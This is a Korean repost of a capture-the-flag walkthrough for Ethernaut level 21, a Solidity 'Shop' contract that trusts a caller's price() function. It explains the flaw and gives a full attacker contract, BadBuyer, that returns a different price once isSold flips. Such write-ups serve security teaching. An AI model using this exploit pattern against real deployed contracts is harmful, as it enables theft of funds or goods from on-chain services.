Ethernaut: 21. 쇼핑하기

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Buyer {
  function price() external view returns (uint);
}

contract Shop {
  uint public price = 100;
  bool public isSold;

  function buy() public {
    Buyer _buyer = Buyer(msg.sender);

    if (_buyer.price() >= price && !isSold) {
      isSold = true;
      price = _buyer.price();
    }
  }
}

우리는 Elevator 레벨에서 비슷한 퍼즐을 겪었습니다. 단일 트랜잭션에서 다른 것을 반환하는 함수가 필요합니다. 가장 기본적인 솔루션은 이를 확인하고gasLeft() 이를 기반으로 다른 결과를 반환하는 것이지만 여기에는 더 깨끗한 솔루션이 있습니다.

function buy() public {
  Buyer _buyer = Buyer(msg.sender);

  // during this call, isSold is false
  if (_buyer.price() >= price && !isSold) {
    // the state will change for isSold
    isSold = true;
    // during this call, isSold is true
    price = _buyer.price();
  }
}

위에서 언급했듯이 isSold의 값을 쿼리하고 이를 기반으로 다른 결과를 반환할 수 있습니다. Shop 계약과 구매자 인터페이스를 제공한다고 가정하면 공격자 계약은 아래와 같습니다.

contract BadBuyer is Buyer { 
  Shop target;
  constructor(address _target) {
    target = Shop(_target);
  }

  function price() external view override returns (uint) {
    return target.isSold() ? 0 : 100;
  }

  function pwn() public {
    target.buy();
  }
}

Reference

이 문제에 관하여(Ethernaut: 21. 쇼핑하기), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/erhant/ethernaut-21-shop-278a

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다